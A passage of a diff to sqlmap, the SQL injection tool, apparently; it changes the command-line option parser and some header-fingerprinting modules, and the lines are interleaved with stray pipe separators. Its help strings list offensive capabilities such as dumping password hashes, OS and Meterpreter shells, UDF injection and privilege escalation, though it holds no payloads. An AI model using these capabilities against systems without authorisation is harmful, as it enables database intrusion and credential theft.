enumeration.add_option("--current-user", dest="getCurrentUser",
|
enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS current user")
|
help="Retrieve DBMS current user")
|
||||||
|
|
||||||
enumeration.add_option("--current-db", dest="getCurrentDb",
|
enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS current database")
|
help="Retrieve DBMS current database")
|
||||||
|
|
||||||
enumeration.add_option("--hostname", dest="getHostname",
|
enumeration.add_option("--hostname", dest="getHostname", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS server hostname")
|
help="Retrieve DBMS server hostname")
|
||||||
|
|
||||||
enumeration.add_option("--is-dba", dest="isDba",
|
enumeration.add_option("--is-dba", dest="isDba", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Detect if the DBMS current user is DBA")
|
help="Detect if the DBMS current user is DBA")
|
||||||
|
|
||||||
enumeration.add_option("--users", dest="getUsers", action="store_true",
|
enumeration.add_option("--users", dest="getUsers", action="store_true",
|
||||||
help="Enumerate DBMS users")
|
help="Enumerate DBMS users")
|
||||||
|
|
||||||
enumeration.add_option("--passwords", dest="getPasswordHashes",
|
enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users password hashes")
|
help="Enumerate DBMS users password hashes")
|
||||||
|
|
||||||
enumeration.add_option("--privileges", dest="getPrivileges",
|
enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users privileges")
|
help="Enumerate DBMS users privileges")
|
||||||
|
|
||||||
enumeration.add_option("--roles", dest="getRoles",
|
enumeration.add_option("--roles", dest="getRoles", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users roles")
|
help="Enumerate DBMS users roles")
|
||||||
|
|
||||||
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
|
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
|
||||||
@@ -453,7 +403,7 @@ def cmdLineParser(argv=None):
|
|||||||
help="Search column(s), table(s) and/or database name(s)")
|
help="Search column(s), table(s) and/or database name(s)")
|
||||||
|
|
||||||
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
||||||
help="Retrieve DBMS comments")
|
help="Check for DBMS comments during enumeration")
|
||||||
|
|
||||||
enumeration.add_option("-D", dest="db",
|
enumeration.add_option("-D", dest="db",
|
||||||
help="DBMS database to enumerate")
|
help="DBMS database to enumerate")
|
||||||
@@ -464,16 +414,14 @@ def cmdLineParser(argv=None):
|
|||||||
enumeration.add_option("-C", dest="col",
|
enumeration.add_option("-C", dest="col",
|
||||||
help="DBMS database table column(s) to enumerate")
|
help="DBMS database table column(s) to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-X", dest="excludeCol",
|
enumeration.add_option("-X", dest="exclude",
|
||||||
help="DBMS database table column(s) to not enumerate")
|
help="DBMS database identifier(s) to not enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-U", dest="user",
|
enumeration.add_option("-U", dest="user",
|
||||||
help="DBMS user to enumerate")
|
help="DBMS user to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
|
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
|
||||||
action="store_true",
|
help="Exclude DBMS system databases when enumerating tables")
|
||||||
help="Exclude DBMS system databases when "
|
|
||||||
"enumerating tables")
|
|
||||||
|
|
||||||
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
||||||
help="Pivot column name")
|
help="Pivot column name")
|
||||||
@@ -496,28 +444,23 @@ def cmdLineParser(argv=None):
|
|||||||
enumeration.add_option("--sql-query", dest="query",
|
enumeration.add_option("--sql-query", dest="query",
|
||||||
help="SQL statement to be executed")
|
help="SQL statement to be executed")
|
||||||
|
|
||||||
enumeration.add_option("--sql-shell", dest="sqlShell",
|
enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Prompt for an interactive SQL shell")
|
help="Prompt for an interactive SQL shell")
|
||||||
|
|
||||||
enumeration.add_option("--sql-file", dest="sqlFile",
|
enumeration.add_option("--sql-file", dest="sqlFile",
|
||||||
help="Execute SQL statements from given file(s)")
|
help="Execute SQL statements from given file(s)")
|
||||||
|
|
||||||
# Brute force options
|
# Brute force options
|
||||||
brute = OptionGroup(parser, "Brute force", "These "
|
brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")
|
||||||
"options can be used to run brute force "
|
|
||||||
"checks")
|
|
||||||
|
|
||||||
brute.add_option("--common-tables", dest="commonTables", action="store_true",
|
brute.add_option("--common-tables", dest="commonTables", action="store_true",
|
||||||
help="Check existence of common tables")
|
help="Check existence of common tables")
|
||||||
|
|
||||||
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
|
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
|
||||||
help="Check existence of common columns")
|
help="Check existence of common columns")
|
||||||
|
|
||||||
# User-defined function options
|
# User-defined function options
|
||||||
udf = OptionGroup(parser, "User-defined function injection", "These "
|
udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")
|
||||||
"options can be used to create custom user-defined "
|
|
||||||
"functions")
|
|
||||||
|
|
||||||
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
|
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
|
||||||
help="Inject custom user-defined functions")
|
help="Inject custom user-defined functions")
|
||||||
@@ -526,164 +469,131 @@ def cmdLineParser(argv=None):
|
|||||||
help="Local path of the shared library")
|
help="Local path of the shared library")
|
||||||
|
|
||||||
# File system options
|
# File system options
|
||||||
filesystem = OptionGroup(parser, "File system access", "These options "
|
filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
|
||||||
"can be used to access the back-end database "
|
|
||||||
"management system underlying file system")
|
|
||||||
|
|
||||||
filesystem.add_option("--file-read", dest="rFile",
|
filesystem.add_option("--file-read", dest="rFile",
|
||||||
help="Read a file from the back-end DBMS "
|
help="Read a file from the back-end DBMS file system")
|
||||||
"file system")
|
|
||||||
|
|
||||||
filesystem.add_option("--file-write", dest="wFile",
|
filesystem.add_option("--file-write", dest="wFile",
|
||||||
help="Write a local file on the back-end "
|
help="Write a local file on the back-end DBMS file system")
|
||||||
"DBMS file system")
|
|
||||||
|
|
||||||
filesystem.add_option("--file-dest", dest="dFile",
|
filesystem.add_option("--file-dest", dest="dFile",
|
||||||
help="Back-end DBMS absolute filepath to "
|
help="Back-end DBMS absolute filepath to write to")
|
||||||
"write to")
|
|
||||||
|
|
||||||
# Takeover options
|
# Takeover options
|
||||||
takeover = OptionGroup(parser, "Operating system access", "These "
|
takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")
|
||||||
"options can be used to access the back-end "
|
|
||||||
"database management system underlying "
|
|
||||||
"operating system")
|
|
||||||
|
|
||||||
takeover.add_option("--os-cmd", dest="osCmd",
|
takeover.add_option("--os-cmd", dest="osCmd",
|
||||||
help="Execute an operating system command")
|
help="Execute an operating system command")
|
||||||
|
|
||||||
takeover.add_option("--os-shell", dest="osShell",
|
takeover.add_option("--os-shell", dest="osShell", action="store_true",
|
||||||
action="store_true",
|
help="Prompt for an interactive operating system shell")
|
||||||
help="Prompt for an interactive operating "
|
|
||||||
"system shell")
|
|
||||||
|
|
||||||
takeover.add_option("--os-pwn", dest="osPwn",
|
takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
|
||||||
action="store_true",
|
help="Prompt for an OOB shell, Meterpreter or VNC")
|
||||||
help="Prompt for an OOB shell, "
|
|
||||||
"Meterpreter or VNC")
|
|
||||||
|
|
||||||
takeover.add_option("--os-smbrelay", dest="osSmb",
|
takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
|
||||||
action="store_true",
|
help="One click prompt for an OOB shell, Meterpreter or VNC")
|
||||||
help="One click prompt for an OOB shell, "
|
|
||||||
"Meterpreter or VNC")
|
|
||||||
|
|
||||||
takeover.add_option("--os-bof", dest="osBof",
|
takeover.add_option("--os-bof", dest="osBof", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Stored procedure buffer overflow "
|
help="Stored procedure buffer overflow "
|
||||||
"exploitation")
|
"exploitation")
|
||||||
|
|
||||||
takeover.add_option("--priv-esc", dest="privEsc",
|
takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Database process user privilege escalation")
|
help="Database process user privilege escalation")
|
||||||
|
|
||||||
takeover.add_option("--msf-path", dest="msfPath",
|
takeover.add_option("--msf-path", dest="msfPath",
|
||||||
help="Local path where Metasploit Framework "
|
help="Local path where Metasploit Framework is installed")
|
||||||
"is installed")
|
|
||||||
|
|
||||||
takeover.add_option("--tmp-path", dest="tmpPath",
|
takeover.add_option("--tmp-path", dest="tmpPath",
|
||||||
help="Remote absolute path of temporary files "
|
help="Remote absolute path of temporary files directory")
|
||||||
"directory")
|
|
||||||
|
|
||||||
# Windows registry options
|
# Windows registry options
|
||||||
windows = OptionGroup(parser, "Windows registry access", "These "
|
windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")
|
||||||
"options can be used to access the back-end "
|
|
||||||
"database management system Windows "
|
|
||||||
"registry")
|
|
||||||
|
|
||||||
windows.add_option("--reg-read", dest="regRead",
|
windows.add_option("--reg-read", dest="regRead", action="store_true",
|
||||||
action="store_true",
|
help="Read a Windows registry key value")
|
||||||
help="Read a Windows registry key value")
|
|
||||||
|
|
||||||
windows.add_option("--reg-add", dest="regAdd",
|
windows.add_option("--reg-add", dest="regAdd", action="store_true",
|
||||||
action="store_true",
|
help="Write a Windows registry key value data")
|
||||||
help="Write a Windows registry key value data")
|
|
||||||
|
|
||||||
windows.add_option("--reg-del", dest="regDel",
|
windows.add_option("--reg-del", dest="regDel", action="store_true",
|
||||||
action="store_true",
|
help="Delete a Windows registry key value")
|
||||||
help="Delete a Windows registry key value")
|
|
||||||
|
|
||||||
windows.add_option("--reg-key", dest="regKey",
|
windows.add_option("--reg-key", dest="regKey",
|
||||||
help="Windows registry key")
|
help="Windows registry key")
|
||||||
|
|
||||||
windows.add_option("--reg-value", dest="regVal",
|
windows.add_option("--reg-value", dest="regVal",
|
||||||
help="Windows registry key value")
|
help="Windows registry key value")
|
||||||
|
|
||||||
windows.add_option("--reg-data", dest="regData",
|
windows.add_option("--reg-data", dest="regData",
|
||||||
help="Windows registry key value data")
|
help="Windows registry key value data")
|
||||||
|
|
||||||
windows.add_option("--reg-type", dest="regType",
|
windows.add_option("--reg-type", dest="regType",
|
||||||
help="Windows registry key value type")
|
help="Windows registry key value type")
|
||||||
|
|
||||||
# General options
|
# General options
|
||||||
general = OptionGroup(parser, "General", "These options can be used "
|
general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")
|
||||||
"to set some general working parameters")
|
|
||||||
|
|
||||||
general.add_option("-s", dest="sessionFile",
|
general.add_option("-s", dest="sessionFile",
|
||||||
help="Load session from a stored (.sqlite) file")
|
help="Load session from a stored (.sqlite) file")
|
||||||
|
|
||||||
general.add_option("-t", dest="trafficFile",
|
general.add_option("-t", dest="trafficFile",
|
||||||
help="Log all HTTP traffic into a "
|
help="Log all HTTP traffic into a textual file")
|
||||||
"textual file")
|
|
||||||
|
|
||||||
general.add_option("--batch", dest="batch",
|
general.add_option("--batch", dest="batch", action="store_true",
|
||||||
action="store_true",
|
help="Never ask for user input, use the default behavior")
|
||||||
help="Never ask for user input, use the default behaviour")
|
|
||||||
|
|
||||||
general.add_option("--binary-fields", dest="binaryFields",
|
general.add_option("--binary-fields", dest="binaryFields",
|
||||||
help="Result fields having binary values (e.g. \"digest\")")
|
help="Result fields having binary values (e.g. \"digest\")")
|
||||||
|
|
||||||
general.add_option("--charset", dest="charset",
|
general.add_option("--check-internet", dest="checkInternet", action="store_true",
|
||||||
help="Force character encoding used for data retrieval")
|
help="Check Internet connection before assessing the target")
|
||||||
|
|
||||||
general.add_option("--check-internet", dest="checkInternet",
|
|
||||||
action="store_true",
|
|
||||||
help="Check Internet connection before assessing the target")
|
|
||||||
|
|
||||||
general.add_option("--crawl", dest="crawlDepth", type="int",
|
general.add_option("--crawl", dest="crawlDepth", type="int",
|
||||||
help="Crawl the website starting from the target URL")
|
help="Crawl the website starting from the target URL")
|
||||||
|
|
||||||
general.add_option("--crawl-exclude", dest="crawlExclude",
|
general.add_option("--crawl-exclude", dest="crawlExclude",
|
||||||
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
|
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
|
||||||
|
|
||||||
general.add_option("--csv-del", dest="csvDel",
|
general.add_option("--csv-del", dest="csvDel",
|
||||||
help="Delimiting character used in CSV output "
|
help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
|
||||||
"(default \"%s\")" % defaults.csvDel)
|
|
||||||
|
general.add_option("--charset", dest="charset",
|
||||||
|
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
|
||||||
|
|
||||||
general.add_option("--dump-format", dest="dumpFormat",
|
general.add_option("--dump-format", dest="dumpFormat",
|
||||||
help="Format of dumped data (CSV (default), HTML or SQLITE)")
|
help="Format of dumped data (CSV (default), HTML or SQLITE)")
|
||||||
|
|
||||||
general.add_option("--eta", dest="eta",
|
general.add_option("--encoding", dest="encoding",
|
||||||
action="store_true",
|
help="Character encoding used for data retrieval (e.g. GBK)")
|
||||||
help="Display for each output the estimated time of arrival")
|
|
||||||
|
|
||||||
general.add_option("--flush-session", dest="flushSession",
|
general.add_option("--eta", dest="eta", action="store_true",
|
||||||
action="store_true",
|
help="Display for each output the estimated time of arrival")
|
||||||
help="Flush session files for current target")
|
|
||||||
|
|
||||||
general.add_option("--forms", dest="forms",
|
general.add_option("--flush-session", dest="flushSession", action="store_true",
|
||||||
action="store_true",
|
help="Flush session files for current target")
|
||||||
help="Parse and test forms on target URL")
|
|
||||||
|
|
||||||
general.add_option("--fresh-queries", dest="freshQueries",
|
general.add_option("--forms", dest="forms", action="store_true",
|
||||||
action="store_true",
|
help="Parse and test forms on target URL")
|
||||||
help="Ignore query results stored in session file")
|
|
||||||
|
general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
|
||||||
|
help="Ignore query results stored in session file")
|
||||||
|
|
||||||
general.add_option("--har", dest="harFile",
|
general.add_option("--har", dest="harFile",
|
||||||
help="Log all HTTP traffic into a HAR file")
|
help="Log all HTTP traffic into a HAR file")
|
||||||
|
|
||||||
general.add_option("--hex", dest="hexConvert",
|
general.add_option("--hex", dest="hexConvert", action="store_true",
|
||||||
action="store_true",
|
help="Use hex conversion during data retrieval")
|
||||||
help="Use DBMS hex function(s) for data retrieval")
|
|
||||||
|
|
||||||
general.add_option("--output-dir", dest="outputDir",
|
general.add_option("--output-dir", dest="outputDir", action="store",
|
||||||
action="store",
|
help="Custom output directory path")
|
||||||
help="Custom output directory path")
|
|
||||||
|
|
||||||
general.add_option("--parse-errors", dest="parseErrors",
|
general.add_option("--parse-errors", dest="parseErrors", action="store_true",
|
||||||
action="store_true",
|
help="Parse and display DBMS error messages from responses")
|
||||||
help="Parse and display DBMS error messages from responses")
|
|
||||||
|
|
||||||
general.add_option("--save", dest="saveConfig",
|
general.add_option("--save", dest="saveConfig",
|
||||||
help="Save options to a configuration INI file")
|
help="Save options to a configuration INI file")
|
||||||
|
|
||||||
general.add_option("--scope", dest="scope",
|
general.add_option("--scope", dest="scope",
|
||||||
help="Regexp to filter targets from provided proxy log")
|
help="Regexp to filter targets from provided proxy log")
|
||||||
@@ -694,77 +604,68 @@ def cmdLineParser(argv=None):
|
|||||||
general.add_option("--test-skip", dest="testSkip",
|
general.add_option("--test-skip", dest="testSkip",
|
||||||
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
|
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
|
||||||
|
|
||||||
general.add_option("--update", dest="updateAll",
|
general.add_option("--update", dest="updateAll", action="store_true",
|
||||||
action="store_true",
|
help="Update sqlmap")
|
||||||
help="Update sqlmap")
|
|
||||||
|
|
||||||
# Miscellaneous options
|
# Miscellaneous options
|
||||||
miscellaneous = OptionGroup(parser, "Miscellaneous")
|
miscellaneous = OptionGroup(parser, "Miscellaneous")
|
||||||
|
|
||||||
miscellaneous.add_option("-z", dest="mnemonics",
|
miscellaneous.add_option("-z", dest="mnemonics",
|
||||||
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
|
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--alert", dest="alert",
|
miscellaneous.add_option("--alert", dest="alert",
|
||||||
help="Run host OS command(s) when SQL injection is found")
|
help="Run host OS command(s) when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--answers", dest="answers",
|
miscellaneous.add_option("--answers", dest="answers",
|
||||||
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
||||||
help="Beep on question and/or when SQL injection is found")
|
help="Beep on question and/or when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--cleanup", dest="cleanup",
|
miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
|
||||||
action="store_true",
|
help="Clean up the DBMS from sqlmap specific UDF and tables")
|
||||||
help="Clean up the DBMS from sqlmap specific "
|
|
||||||
"UDF and tables")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--dependencies", dest="dependencies",
|
miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
|
||||||
action="store_true",
|
help="Check for missing (non-core) sqlmap dependencies")
|
||||||
help="Check for missing (non-core) sqlmap dependencies")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--disable-coloring", dest="disableColoring",
|
miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true",
|
||||||
action="store_true",
|
help="Disable console output coloring")
|
||||||
help="Disable console output coloring")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
|
miscellaneous.add_option("--gpage", dest="googlePage", type="int",
|
||||||
help="Use Google dork results from specified page number")
|
help="Use Google dork results from specified page number")
|
||||||
|
|
||||||
miscellaneous.add_option("--identify-waf", dest="identifyWaf",
|
miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
|
||||||
action="store_true",
|
help="Make a thorough testing for a WAF/IPS/IDS protection")
|
||||||
help="Make a thorough testing for a WAF/IPS/IDS protection")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--mobile", dest="mobile",
|
miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true",
|
||||||
action="store_true",
|
help="Display list of available tamper scripts")
|
||||||
help="Imitate smartphone through HTTP User-Agent header")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--offline", dest="offline",
|
miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
|
||||||
action="store_true",
|
help="Imitate smartphone through HTTP User-Agent header")
|
||||||
help="Work in offline mode (only use session data)")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--purge-output", dest="purgeOutput",
|
miscellaneous.add_option("--offline", dest="offline", action="store_true",
|
||||||
action="store_true",
|
help="Work in offline mode (only use session data)")
|
||||||
help="Safely remove all content from output directory")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--skip-waf", dest="skipWaf",
|
miscellaneous.add_option("--purge", dest="purge", action="store_true",
|
||||||
action="store_true",
|
help="Safely remove all content from sqlmap data directory")
|
||||||
help="Skip heuristic detection of WAF/IPS/IDS protection")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--smart", dest="smart",
|
miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
|
||||||
action="store_true",
|
help="Skip heuristic detection of WAF/IPS/IDS protection")
|
||||||
help="Conduct thorough tests only if positive heuristic(s)")
|
|
||||||
|
miscellaneous.add_option("--smart", dest="smart", action="store_true",
|
||||||
|
help="Conduct thorough tests only if positive heuristic(s)")
|
||||||
|
|
||||||
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
||||||
help="Prompt for an interactive sqlmap shell")
|
help="Prompt for an interactive sqlmap shell")
|
||||||
|
|
||||||
miscellaneous.add_option("--tmp-dir", dest="tmpDir",
|
miscellaneous.add_option("--tmp-dir", dest="tmpDir",
|
||||||
help="Local directory for storing temporary files")
|
help="Local directory for storing temporary files")
|
||||||
|
|
||||||
miscellaneous.add_option("--web-root", dest="webRoot",
|
miscellaneous.add_option("--web-root", dest="webRoot",
|
||||||
help="Web server document root directory (e.g. \"/var/www\")")
|
help="Web server document root directory (e.g. \"/var/www\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--wizard", dest="wizard",
|
miscellaneous.add_option("--wizard", dest="wizard", action="store_true",
|
||||||
action="store_true",
|
help="Simple wizard interface for beginner users")
|
||||||
help="Simple wizard interface for beginner users")
|
|
||||||
|
|
||||||
# Hidden and/or experimental options
|
# Hidden and/or experimental options
|
||||||
parser.add_option("--dummy", dest="dummy", action="store_true",
|
parser.add_option("--dummy", dest="dummy", action="store_true",
|
||||||
@@ -782,9 +683,15 @@ def cmdLineParser(argv=None):
|
|||||||
parser.add_option("--profile", dest="profile", action="store_true",
|
parser.add_option("--profile", dest="profile", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
|
parser.add_option("--force-dbms", dest="forceDbms",
|
||||||
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
|
parser.add_option("--force-pivoting", dest="forcePivoting", action="store_true",
|
||||||
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
|
parser.add_option("--force-threads", dest="forceThreads", action="store_true",
|
||||||
help=SUPPRESS_HELP)
|
help=SUPPRESS_HELP)
|
||||||
|
|
||||||
@@ -903,7 +810,7 @@ def cmdLineParser(argv=None):
|
|||||||
for arg in shlex.split(command):
|
for arg in shlex.split(command):
|
||||||
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||||
except ValueError, ex:
|
except ValueError, ex:
|
||||||
raise SqlmapSyntaxException, "something went wrong during command line parsing ('%s')" % ex.message
|
raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % ex.message)
|
||||||
|
|
||||||
for i in xrange(len(argv)):
|
for i in xrange(len(argv)):
|
||||||
if argv[i] == "-hh":
|
if argv[i] == "-hh":
|
||||||
@@ -970,11 +877,9 @@ def cmdLineParser(argv=None):
|
|||||||
if args.dummy:
|
if args.dummy:
|
||||||
args.url = args.url or DUMMY_URL
|
args.url = args.url or DUMMY_URL
|
||||||
|
|
||||||
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
|
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)):
|
||||||
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
|
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). "
|
||||||
args.purgeOutput, args.sitemapUrl)):
|
errMsg += "Use -h for basic and -hh for advanced help\n"
|
||||||
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
|
|
||||||
errMsg += "use -h for basic or -hh for advanced help\n"
|
|
||||||
parser.error(errMsg)
|
parser.error(errMsg)
|
||||||
|
|
||||||
return args
|
return args
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.common import checkFile
|
from lib.core.common import checkFile
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@@ -44,7 +44,7 @@ class FingerprintHandler(ContentHandler):
|
|||||||
def startElement(self, name, attrs):
|
def startElement(self, name, attrs):
|
||||||
if name == "regexp":
|
if name == "regexp":
|
||||||
self._regexp = sanitizeStr(attrs.get("value"))
|
self._regexp = sanitizeStr(attrs.get("value"))
|
||||||
_ = re.match("\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes
|
_ = re.match(r"\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes
|
||||||
|
|
||||||
if _ and _.group(0).lower() in self._banner.lower() or not _:
|
if _ and _.group(0).lower() in self._banner.lower() or not _:
|
||||||
self._match = re.search(self._regexp, self._banner, re.I | re.M)
|
self._match = re.search(self._regexp, self._banner, re.I | re.M)
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import itertools
|
import itertools
|
||||||
@@ -13,7 +13,6 @@ from lib.core.data import kb
|
|||||||
from lib.core.data import paths
|
from lib.core.data import paths
|
||||||
from lib.parse.handler import FingerprintHandler
|
from lib.parse.handler import FingerprintHandler
|
||||||
|
|
||||||
|
|
||||||
def headersParser(headers):
|
def headersParser(headers):
|
||||||
"""
|
"""
|
||||||
This function calls a class that parses the input HTTP headers to
|
This function calls a class that parses the input HTTP headers to
|
||||||
@@ -23,20 +22,17 @@ def headersParser(headers):
|
|||||||
|
|
||||||
if not kb.headerPaths:
|
if not kb.headerPaths:
|
||||||
kb.headerPaths = {
|
kb.headerPaths = {
|
||||||
"cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
|
|
||||||
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
|
"microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
|
||||||
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
|
"server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
|
||||||
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
|
"servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"),
|
||||||
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
|
"set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"),
|
||||||
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
|
"x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
|
||||||
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
|
"x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
|
||||||
}
|
}
|
||||||
|
|
||||||
for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
|
for header in itertools.ifilter(lambda _: _ in kb.headerPaths, headers):
|
||||||
value = headers[header]
|
value = headers[header]
|
||||||
xmlfile = kb.headerPaths[header]
|
xmlfile = kb.headerPaths[header]
|
||||||
|
|
||||||
handler = FingerprintHandler(value, kb.headersFp)
|
handler = FingerprintHandler(value, kb.headersFp)
|
||||||
|
|
||||||
parseXmlFile(xmlfile, handler)
|
parseXmlFile(xmlfile, handler)
|
||||||
parseXmlFile(paths.GENERIC_XML, handler)
|
parseXmlFile(paths.GENERIC_XML, handler)
|
||||||
|
|||||||
@@ -1,14 +1,15 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
